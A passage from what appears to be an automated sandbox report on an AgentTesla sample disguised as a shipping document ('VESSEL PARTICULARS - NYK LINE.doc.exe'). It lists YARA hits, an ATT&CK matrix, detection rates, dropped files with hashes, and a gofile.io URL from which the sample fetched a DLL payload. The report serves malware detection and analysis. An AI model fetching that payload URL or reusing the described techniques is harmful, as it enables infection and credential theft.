                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                      Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.783730951.0000000002F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.783730951.0000000002F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 1 | Input Capture 1 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Service Execution 2 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | System Information Discovery 13 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Access Token Manipulation 1 | Obfuscated Files or Information 12 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Windows Service 1 | Timestomp 1 | NTDS | Security Software Discovery 11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Masquerading 11 | LSA Secrets | Virtualization/Sandbox Evasion 21 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

[Behavior graph image not reproduced. Behavior Graph ID: 492154; Sample: VESSEL PARTICULARS - NYK LI...; Start date: 28/09/2021; Architecture: WINDOWS; Score: 100. The graph shows VESSEL PARTICULARS - NYK LINE.doc.exe contacting store2.gofile.io (31.14.69.10, port 443), dropping C:\...\VESSEL PARTICULARS - NYK LINE.doc.exe (PE32) and C:\Users\user\AppData\...\AdvancedRun.exe (PE32), and starting three powershell.exe processes (each with a conhost.exe child) plus 9 other processes, including AdvancedRun.exe.]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
VESSEL PARTICULARS - NYK LINE.doc.exe | 59% | Virustotal |
VESSEL PARTICULARS - NYK LINE.doc.exe | 31% | Metadefender |
VESSEL PARTICULARS - NYK LINE.doc.exe | 86% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
VESSEL PARTICULARS - NYK LINE.doc.exe | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe | 59% | Virustotal |
C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe | 31% | Metadefender |
C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe | 86% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
star-mini.c10r.facebook.com | 157.240.9.35 | true | false | | high
twitter.com | 104.244.42.129 | true | false | | high
www.google.com | 142.250.185.196 | true | false | | high
store2.gofile.io | 31.14.69.10 | true | false | | high
www.facebook.com | unknown | unknown | false | | high
www.twitter.com | unknown | unknown | false | | high

                                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://store2.gofile.io/download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll | false | | high

                                    URLs from Memory and Binaries


                                                              Contacted IPs

                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
31.14.69.10 | store2.gofile.io | Virgin Islands (BRITISH) | 199483 | LINKER-ASFR | false

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 492154
Start date: 28.09.2021
Start time: 12:16:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: VESSEL PARTICULARS - NYK LINE.doc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@35/20@49/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 88.9% (good quality ratio 83.7%)
• Quality average: 81.6%
• Quality standard deviation: 27.8%
HCA Information:
• Successful, ratio: 82%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240s for sample based on specific behavior
                                                              Warnings:
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 13.107.42.16, 13.107.5.88, 20.199.120.85, 20.199.120.182, 20.199.120.151
                                                              • Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, l-0007.config.skype.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              Time | Type | Description
                                                              12:17:30 | API Interceptor | 147x Sleep call for process: powershell.exe modified
                                                              12:19:18 | API Interceptor | 811x Sleep call for process: VESSEL PARTICULARS - NYK LINE.doc.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASN

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VESSEL PARTICULARS - NYK LINE.doc.exe.log
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):1119
                                                              Entropy (8bit):5.356708753875314
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                              Malicious:true
                                                              Reputation:unknown
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):19732
                                                              Entropy (8bit):5.601737779976581
                                                              Encrypted:false
                                                              SSDEEP:384:jtNzXnq0+/aa4rIubCLnYSBKnUgul9tqpaeQ99gtqceZgVjpwSVyY3:qtbuiY4KBul7aat8EgVjplL3
                                                              MD5:67E3C6A1F09FBDFB78277D8465344B09
                                                              SHA1:D7CA81E221C0A645B5D71811013E9874EB6FD210
                                                              SHA-256:E37FC23E37B031261CCE67E4BC4B05784FF02DFF5111447C257587156848E1F9
                                                              SHA-512:7936F63C184C5E7DF4A1870C743805DC0BDE1DD878472854CAEE4C4A3AB476AAD32C6EE0C36A3E143CB55A92E24BD4A50FC4CBF4DC4E2A27D3DE0B94E9C10675
                                                              Malicious:false
                                                              Reputation:unknown
                                                              C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):91000
                                                              Entropy (8bit):6.241345766746317
                                                              Encrypted:false
                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:unknown
                                                              C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):393216
                                                              Entropy (8bit):2.6309833530297553
                                                              Encrypted:false
                                                              SSDEEP:3072:qx4Jmb4+WHRWm+3TkQ/b62tN+mbjOKC1g2L4o:qvb4+WZQJ0
                                                              MD5:93445DF2C96362810E0395C5C867700E
                                                              SHA1:645F936406B04FBFB737BBFFB5678D5255C6EC34
                                                              SHA-256:ECB4FE719A7FC1365D70EC9DB8B3C74CB4BF8968324C25D3817FCC5628FAE6FA
                                                              SHA-512:BFCFC7C220963F8269537B737D71251DFE3A9F6A800E7D65E3A1FD449A4F3F9E12C7F20207543009F8655A4FDFA672A11173DE27E682478DA4F15A0875F3BAE8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: Virustotal, Detection: 59%, Browse
                                                              • Antivirus: Metadefender, Detection: 31%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 86%
                                                              Reputation:unknown
                                                              C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe:Zone.Identifier
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:unknown
                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25pybtxr.qnw.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4itwdkw.tby.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c43m055d.dm3.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
